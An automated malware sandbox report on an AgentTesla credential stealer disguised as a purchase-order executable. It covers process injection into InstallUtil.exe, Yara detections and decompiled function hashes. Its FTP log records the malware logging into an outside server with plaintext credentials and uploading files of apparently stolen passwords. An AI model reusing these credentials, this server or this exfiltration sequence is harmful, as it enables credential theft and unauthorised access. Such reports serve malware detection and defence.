2024-10-04 08:41:28 UTC	8000	IN	Data Raw: 34 51 57 d6 6a 59 e4 85 2b 89 89 87 30 72 99 f1 0c 97 ca 0f da dc d9 78 86 4a c3 22 82 22 8b 5e 29 e8 8a c8 0b 40 06 9c 71 a9 1b fd 97 8f b7 6f 1f d6 d1 03 a2 ac c2 23 4c 55 6e c4 b2 a7 7c fb 25 d3 b2 08 61 9b 3c b6 d6 4a 46 c1 44 f9 2a 12 53 eb b4 f5 c6 f5 cb db 58 b7 21 ee 9a dc 37 e0 68 33 a0 43 0a 09 80 07 f8 7e 51 71 a4 85 63 52 a9 aa e4 4e 3c 2f 50 d3 8f 6e e7 bc 5c 1e d6 7b f8 8f 09 64 bb 97 4b dd 39 96 67 65 9e 18 82 b5 80 4b 0e f8 99 96 d8 bb 56 a5 f1 1c 22 e1 6f 4a a2 06 52 80 26 4d 4d 71 99 6a 7d 00 54 e0 ed 0c 5f b3 dc ca 6d b2 96 5d db 6e 4a fd 1a 40 95 b7 ba ee eb b1 aa 92 ac f8 cf 90 32 02 2f ee 83 8b a1 e9 d3 05 0b e9 6a 65 6e 74 d2 6c f6 a0 6c ff 5b 84 2a a4 9a 5d e3 10 22 ae 40 67 30 0c 75 f1 59 d1 b8 b3 22 41 4e 91 b0 ce f5 0e 7e 5d ea Data Ascii: 4QWjY+0rxJ""^)@qo#LUn\|%a<JFDSX!7h3C~QqcRN</Pn\{dK9geKV"oJR&MMqj}T_m]nJ@2/jentll[]"@g0uY"AN~]
2024-10-04 08:41:28 UTC	8000	IN	Data Raw: f9 9c 5f 37 dc 28 7b 3f 05 d7 f3 80 4e 90 02 23 ca e6 56 c5 57 6e 1d 63 3f ea e1 84 8c cb 6c d8 ce d1 bf 5e 71 43 20 7b 2d 50 5e f7 2c bb e0 35 30 82 9e 24 ee 14 4b b8 dc 3b 73 43 8d fe 82 40 d5 4f c5 eb f1 6c fa 80 57 52 f7 22 a6 1d 15 b2 8e 03 23 46 d3 b0 70 c4 e0 52 77 6a f9 3a 5d a4 01 36 04 94 39 af 99 14 8d 1f a4 1b e8 8f 6c 91 d8 04 8b e8 24 04 74 6b 08 ef 50 2c 2d 5e 46 35 d6 86 30 b8 e5 37 da 12 d6 f5 9c 9e 44 28 8b 10 bb 69 3b 06 0f 4b f4 bc d8 03 bb ad d5 2d dc 51 2b b4 bc 10 ea d9 ed 99 71 10 d0 1a d1 fb df a3 24 8e 00 28 02 d9 cb ca 6e f4 ea 35 1b 04 cf b8 ee 92 6d 51 d0 23 ea 26 63 32 1a cb c3 9f 7f bc 15 29 8a f8 83 97 0b 36 de e0 2a c6 f7 f6 85 20 53 ad f8 11 2f bc 3e 97 42 ab 27 0d eb 52 ad bb ac de 9d 5b d1 9d ab ff 57 a6 8e 59 90 ce b8 Data Ascii: _7({?N#VWnc?l^qC {-P^,50$K;sC@OlWR"#FpRwj:]69l$tkP,-^F507D(i;K-Q+q$(n5mQ#&c2)6* S/>B'R[WY
2024-10-04 08:41:28 UTC	8000	IN	Data Raw: 05 fe de fe 46 da 07 eb c8 c7 01 a8 e9 3f 18 78 9d 35 b9 39 1b ec 68 f3 fa f8 59 fe 36 74 23 5e 13 56 aa 2d c8 ad 05 94 31 27 43 f4 b3 e1 64 a7 ae dc 94 68 8b 73 ef db ea 03 38 43 01 56 3a cc 54 27 50 83 d2 ea 8f 96 21 ed e0 75 f7 72 d4 30 e7 c5 18 d8 06 ac e8 bb c4 72 43 47 43 67 05 55 ad e2 0c 69 c3 b5 6f fe 15 ac eb ce 55 d2 f8 3b 90 b2 9a 00 36 8d b8 f1 8b 24 e4 0f 24 ce 38 8c 91 20 ae 5b 88 e3 bf c3 38 dd 07 a9 cb 6a fe d8 84 c5 66 18 95 ec f4 70 c2 be 2e 01 0b e3 36 c7 5c c3 50 0e 2f cc 38 e7 c3 f8 1b a2 37 6e d4 fe 78 90 b2 60 3c 57 dc 29 91 5d 95 04 97 57 c5 c0 61 cf 56 ac 3b 23 a1 81 6a 3e 2b 66 54 07 b5 cf 6b 4f 9e 00 3d 1a 5a 00 74 8d de 1f f6 0c eb d9 25 8d 80 55 73 a9 ed 75 0d 81 17 a7 49 b0 25 d1 a3 37 81 07 2d 61 16 08 83 75 b2 e3 da 48 f9 Data Ascii: F?x59hY6t#^V-1'Cdhs8CV:T'P!ur0rCGCgUioU;6$$8 [8jfp.6\P/87nx`<W)]WaV;#j>+fTkO=Zt%UsuI%7-auH

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 4, 2024 10:41:10.691214085 CEST	21	49700	5.2.84.236	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:41. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
Oct 4, 2024 10:41:10.691467047 CEST	49700	21	192.168.2.7	5.2.84.236	USER fgghv@alternatifplastik.com
Oct 4, 2024 10:41:10.912194014 CEST	21	49700	5.2.84.236	192.168.2.7	331 User fgghv@alternatifplastik.com OK. Password required
Oct 4, 2024 10:41:10.912406921 CEST	49700	21	192.168.2.7	5.2.84.236	PASS Fineboy777@
Oct 4, 2024 10:41:11.197617054 CEST	21	49700	5.2.84.236	192.168.2.7	230 OK. Current restricted directory is /
Oct 4, 2024 10:41:11.423341036 CEST	21	49700	5.2.84.236	192.168.2.7	504 Unknown command
Oct 4, 2024 10:41:11.423626900 CEST	49700	21	192.168.2.7	5.2.84.236	PWD
Oct 4, 2024 10:41:11.644280910 CEST	21	49700	5.2.84.236	192.168.2.7	257 "/" is your current location
Oct 4, 2024 10:41:11.652342081 CEST	49700	21	192.168.2.7	5.2.84.236	TYPE I
Oct 4, 2024 10:41:11.873224020 CEST	21	49700	5.2.84.236	192.168.2.7	200 TYPE is now 8-bit binary
Oct 4, 2024 10:41:11.874077082 CEST	49700	21	192.168.2.7	5.2.84.236	PASV
Oct 4, 2024 10:41:12.325442076 CEST	21	49700	5.2.84.236	192.168.2.7	227 Entering Passive Mode (5,2,84,236,205,80)
Oct 4, 2024 10:41:12.325537920 CEST	21	49700	5.2.84.236	192.168.2.7	227 Entering Passive Mode (5,2,84,236,205,80)
Oct 4, 2024 10:41:12.348578930 CEST	49700	21	192.168.2.7	5.2.84.236	STOR PW_user-992547_2024_10_04_04_41_08.html
Oct 4, 2024 10:41:12.960972071 CEST	21	49700	5.2.84.236	192.168.2.7	150 Accepted data connection
Oct 4, 2024 10:41:13.182835102 CEST	21	49700	5.2.84.236	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.222 seconds (measured here), 1.42 Kbytes per second
Oct 4, 2024 10:41:22.059770107 CEST	21	49740	5.2.84.236	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:41. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
Oct 4, 2024 10:41:22.060616970 CEST	49740	21	192.168.2.7	5.2.84.236	USER fgghv@alternatifplastik.com
Oct 4, 2024 10:41:22.280162096 CEST	21	49740	5.2.84.236	192.168.2.7	331 User fgghv@alternatifplastik.com OK. Password required
Oct 4, 2024 10:41:22.280297041 CEST	49740	21	192.168.2.7	5.2.84.236	PASS Fineboy777@
Oct 4, 2024 10:41:22.526762009 CEST	21	49740	5.2.84.236	192.168.2.7	230 OK. Current restricted directory is /
Oct 4, 2024 10:41:22.746406078 CEST	21	49740	5.2.84.236	192.168.2.7	504 Unknown command
Oct 4, 2024 10:41:22.746565104 CEST	49740	21	192.168.2.7	5.2.84.236	PWD
Oct 4, 2024 10:41:22.965718985 CEST	21	49740	5.2.84.236	192.168.2.7	257 "/" is your current location
Oct 4, 2024 10:41:22.965887070 CEST	49740	21	192.168.2.7	5.2.84.236	TYPE I
Oct 4, 2024 10:41:23.185127974 CEST	21	49740	5.2.84.236	192.168.2.7	200 TYPE is now 8-bit binary
Oct 4, 2024 10:41:23.185275078 CEST	49740	21	192.168.2.7	5.2.84.236	PASV
Oct 4, 2024 10:41:23.406007051 CEST	21	49740	5.2.84.236	192.168.2.7	227 Entering Passive Mode (5,2,84,236,208,246)
Oct 4, 2024 10:41:23.412076950 CEST	49740	21	192.168.2.7	5.2.84.236	STOR PW_user-992547_2024_10_04_04_41_19.html
Oct 4, 2024 10:41:24.033534050 CEST	21	49740	5.2.84.236	192.168.2.7	150 Accepted data connection
Oct 4, 2024 10:41:24.258876085 CEST	21	49740	5.2.84.236	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.225 seconds (measured here), 1.40 Kbytes per second
Oct 4, 2024 10:41:31.766683102 CEST	21	49796	5.2.84.236	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:41. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:41. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
Oct 4, 2024 10:41:31.767105103 CEST	49796	21	192.168.2.7	5.2.84.236	USER fgghv@alternatifplastik.com
Oct 4, 2024 10:41:31.987329006 CEST	21	49796	5.2.84.236	192.168.2.7	331 User fgghv@alternatifplastik.com OK. Password required
Oct 4, 2024 10:41:32.035418987 CEST	49796	21	192.168.2.7	5.2.84.236	PASS Fineboy777@
Oct 4, 2024 10:41:32.275590897 CEST	21	49796	5.2.84.236	192.168.2.7	230 OK. Current restricted directory is /
Oct 4, 2024 10:41:32.501310110 CEST	21	49796	5.2.84.236	192.168.2.7	504 Unknown command
Oct 4, 2024 10:41:32.501475096 CEST	49796	21	192.168.2.7	5.2.84.236	PWD
Oct 4, 2024 10:41:32.720915079 CEST	21	49796	5.2.84.236	192.168.2.7	257 "/" is your current location
Oct 4, 2024 10:41:32.721080065 CEST	49796	21	192.168.2.7	5.2.84.236	TYPE I
Oct 4, 2024 10:41:32.940625906 CEST	21	49796	5.2.84.236	192.168.2.7	200 TYPE is now 8-bit binary
Oct 4, 2024 10:41:32.940798044 CEST	49796	21	192.168.2.7	5.2.84.236	PASV
Oct 4, 2024 10:41:33.161684036 CEST	21	49796	5.2.84.236	192.168.2.7	227 Entering Passive Mode (5,2,84,236,199,70)
Oct 4, 2024 10:41:33.169028044 CEST	49796	21	192.168.2.7	5.2.84.236	STOR PW_user-992547_2024_10_04_05_48_10.html
Oct 4, 2024 10:41:33.785227060 CEST	21	49796	5.2.84.236	192.168.2.7	150 Accepted data connection
Oct 4, 2024 10:41:34.827574015 CEST	21	49796	5.2.84.236	192.168.2.7	150 Accepted data connection
Oct 4, 2024 10:41:34.827831984 CEST	21	49796	5.2.84.236	192.168.2.7	150 Accepted data connection
Oct 4, 2024 10:41:34.828270912 CEST	21	49796	5.2.84.236	192.168.2.7	150 Accepted data connection
Oct 4, 2024 10:41:35.043878078 CEST	21	49796	5.2.84.236	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 1.259 seconds (measured here), 256.65 bytes per second

Target ID:	0
Start time:	04:41:03
Start date:	04/10/2024
Path:	C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe"
Imagebase:	0xe0000
File size:	1'559'040 bytes
MD5 hash:	96A7EC39104585A6DEDC95933DD9AC66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1315698020.0000000005920000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1290774383.00000000025E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:41:07
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xd0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1413730064.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1413730064.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1413730064.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:41:15
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Roaming\Iujcy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Iujcy.exe"
Imagebase:	0x760000
File size:	1'559'040 bytes
MD5 hash:	96A7EC39104585A6DEDC95933DD9AC66
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.1409827566.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs Detection: 32%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:41:18
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xea0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1516278275.000000000315E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1516278275.000000000311C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1516278275.000000000311C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:41:24
Start date:	04/10/2024
Path:	C:\Users\user\AppData\Roaming\Iujcy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Iujcy.exe"
Imagebase:	0x2e0000
File size:	1'559'040 bytes
MD5 hash:	96A7EC39104585A6DEDC95933DD9AC66
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.1515623045.00000000027F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:48:09
Start date:	04/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xb70000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2503048867.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2503048867.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.5%
Total number of Nodes:	46
Total number of Limit Nodes:	1

Executed Functions

Function 05B10040 Relevance: 16.2, Strings: 12, Instructions: 1168COMMON

Download Yara Rule

Strings

$q, xrefs: 05B1097A
$q, xrefs: 05B10497
,q, xrefs: 05B10AFA
$q, xrefs: 05B1096A
$q, xrefs: 05B10547
4, xrefs: 05B10A15
$q, xrefs: 05B102D3
$q, xrefs: 05B102C3
$q, xrefs: 05B10487
$q, xrefs: 05B10911
$q, xrefs: 05B10537
$q, xrefs: 05B10921

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: ,q$4$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-2072453518
Opcode ID: c31fd57fb0cc30b7d2dfe7d1ae6590ec2b3804ea77b6238c4d0bbc0ca402fa77
Instruction ID: 401abac141763e788b46e39d118fd3908c55c891d996675b87925dc307f5365e
Opcode Fuzzy Hash: c31fd57fb0cc30b7d2dfe7d1ae6590ec2b3804ea77b6238c4d0bbc0ca402fa77
Instruction Fuzzy Hash: 2BB21934A00218CFDB54DF98D899FADB7B6FF48300F548599E906AB2A5CB70AC85CF54

Function 05B10367 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

,q, xrefs: 05B10AFA
$q, xrefs: 05B1096A
4, xrefs: 05B10A15
$q, xrefs: 05B10487
$q, xrefs: 05B10911
$q, xrefs: 05B10537

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: ,q$4$$q$$q$$q$$q
API String ID: 0-3956183810
Opcode ID: 90a3353c64bb8c8d0dfdb7a780edbe38208b9c9e0b9558ca8d6c68765a7550d9
Instruction ID: 9bf96e29b11629997bbe3ca03ae118ac159b24b92930f473e3c53e9db56f500b
Opcode Fuzzy Hash: 90a3353c64bb8c8d0dfdb7a780edbe38208b9c9e0b9558ca8d6c68765a7550d9
Instruction Fuzzy Hash: DF222C34A00218CFDB64DF55C998BADB7B6FF48300F5481D9E90AAB2A5DB30AD85CF54

Function 057D4EE0 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pq, xrefs: 057D5A9A
xbq, xrefs: 057D500D
TJq, xrefs: 057D5082
Teq, xrefs: 057D5603

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: TJq$Teq$pq$xbq
API String ID: 0-2466396065
Opcode ID: 88322380b14655d223174f0148b913c9cbed6e73e5336bd52781e89999cfbee4
Instruction ID: 651d294d29b6743038e1c1e1cf8059e49529a5a24997cd84430e9f7d8b10a4b3
Opcode Fuzzy Hash: 88322380b14655d223174f0148b913c9cbed6e73e5336bd52781e89999cfbee4
Instruction Fuzzy Hash: B1A2C675E00628CFDB64CF69C984A99BBB2FF89300F1581E9D509AB325DB319E81DF50

Function 057D75C0 Relevance: 3.6, Strings: 2, Instructions: 1086
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xM, xrefs: 057D8574, 057D8579
2, xrefs: 057D8110

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 2$xM
API String ID: 0-3079687329
Opcode ID: 7d49d75f98ca8e26ff62fe8b7205a62d881bf12d8408f5781f5d294b0d48a890
Instruction ID: 5e546b162ce265f9362878413fcfaa8dc332407a647c5546393682809f50cdc6
Opcode Fuzzy Hash: 7d49d75f98ca8e26ff62fe8b7205a62d881bf12d8408f5781f5d294b0d48a890
Instruction Fuzzy Hash: A4C2D1B4E00228CFDB65DF28D984B99BBB6FB89300F1081E9E509A7355DB309E85DF51

Function 05B13A90 Relevance: 3.1, Strings: 2, Instructions: 640
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 05B13D5E
Plq, xrefs: 05B13C78

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Plq$$q
API String ID: 0-181920578
Opcode ID: d548c6c548547057629975f652bacecd41be47a8ded7568aa9b0b531e99e414b
Instruction ID: e4e0cd41f4fb82dd9d8eefd064a595c0d6e1bb90136c55f2802507d73f699765
Opcode Fuzzy Hash: d548c6c548547057629975f652bacecd41be47a8ded7568aa9b0b531e99e414b
Instruction Fuzzy Hash: 5A325B34B00204CFDB54DF29C588A6A7BF2FF89741B6584A9E906CB365DB31EC42CB59

Function 05AF9DF8 Relevance: 3.0, Strings: 2, Instructions: 544
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 05AF9F04
fq, xrefs: 05AF9F17

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: fq$8
API String ID: 0-1651916650
Opcode ID: 2f8e34ff21e76e02f51cd59d4fb3a971958a58a5d0f7e66b97ae7243d43d5932
Instruction ID: 701fe14b61ef0be8e55d9ec29dfcaeca6854d55233613d0fa3eb1f7408ecaebe
Opcode Fuzzy Hash: 2f8e34ff21e76e02f51cd59d4fb3a971958a58a5d0f7e66b97ae7243d43d5932
Instruction Fuzzy Hash: 0242C375D006298FDB64DF69C850BD9BBB2BF89300F1486EAD50DA7255EB30AE81CF50

Function 05AF9DE9 Relevance: 2.7, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fq, xrefs: 05AF9F17
h, xrefs: 05AF9EF8

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: fq$h
API String ID: 0-152923806
Opcode ID: d7ac0239ba13b3b562a4fb14b34df1200a5454073e72effe4b33683ad5113dd0
Instruction ID: 52bca6396d574a9416ea96a9a0e2a2197d560ca50ed3e7ca4c6f5e3a4d4c85f6
Opcode Fuzzy Hash: d7ac0239ba13b3b562a4fb14b34df1200a5454073e72effe4b33683ad5113dd0
Instruction Fuzzy Hash: 7661A471D006299BEB64DFAACC50BD9FBB2BF89300F54C2AAD50DA7254DB305A85CF50

Function 0584C0A8 Relevance: 1.6, Strings: 1, Instructions: 366COMMON

Download Yara Rule

Strings

Teq, xrefs: 0584C344

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

